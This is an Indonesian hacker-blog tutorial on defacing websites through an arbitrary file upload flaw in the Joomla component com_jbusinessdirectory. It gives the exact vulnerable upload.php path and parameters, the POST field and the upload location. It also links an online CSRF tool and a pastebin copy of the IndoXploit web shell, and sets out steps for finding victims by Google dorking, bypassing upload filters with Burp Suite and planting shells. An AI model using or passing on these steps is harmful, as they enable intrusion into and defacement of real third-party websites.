Exploit com_jbusinessdirectory Arbitrary File Upload (Indonesia Code Party)

Assalamualaikum Wr.Wb

Baiklah kembali lagi dengan saya Mr.Adewa
Pada kali ini saya akan memberikan Tutorial Deface Exploit com_jbusinessdirectory Arbitrary File Upload (Indonesia Code Party)

Sebelum itu kita harus mempersiapkan sesuatu
-Dork

USE YOUR BRAIN (mimin lagi malas mikir), maklum lagi banyak kerjaan

-Shel
Gunakan shel IndoXploit saja

https://pastebin.com/raw/fnXXcFC2

Catatan menurut Pemilik Exploit (Menggunakan CSRF)
CSRF ONLINE

http://tools.alltutorcyber.org/tools/csrf.php

exploit:

/components/com_jbusinessdirectory/assets/upload.php?_root_app=/home/user/public_html/media/com_jbusinessdirectory/pictures&_target=/reviews/0/

postfile:
file

path upload:

/media/com_jbusinessdirectory/pictures/reviews/0/

catatan:
untuk root path nya harus tepat (misal : /home/icp/public_html/) dan folder target bisa di ubah sesuka hati
contoh :
icpdotcom/components/com_jbusinessdirectory/assets/upload.php?_root_app=/home/icp/public_html/images&_target=/nitip/
nanti filenya ada di icpdotcom/images/nitip/fileĀ  (kadang filenya g keupload,jadi pinter” aja mainin path nya)

1. Dorking dulu di google, di sini saya menggunakan versi saya sendiri, jadi dorking aja uploader. Jika menemukan comment
Akan ada add preview seperti ini

2. Upload shel kalian, jika tidak bisa di upload (Bypass menggunakan Burp Suite)

3. Di sini saya menggunakan Uploader Homeroot, jadi saya akan up uploader

4. Setelah itu kita upload shel masing-masing

Mungkin sampai sini kalian juga ada yang belum paham.
Di sini saya menggunakan versi sendiri, bukan versi si penemu Exploit

Terimakasih buat kalian semua karena telah membaca Content "Exploit com_jbusinessdirectory Arbitrary File Upload (Indonesia Code Party)" Setelah membaca
Saya ingin menjelaskan beberapa HAL, jika kalian terkena masalah web ini tidak akan betanggung jawab atas masalah kalian. Jadi intinya gunakanlah ilmu kalina untuk sesuatu yang berguna atau gunakan untuk kebaikan, jangan di pakai untuk merusak mulu
Jika kalian paham Cukup Sekian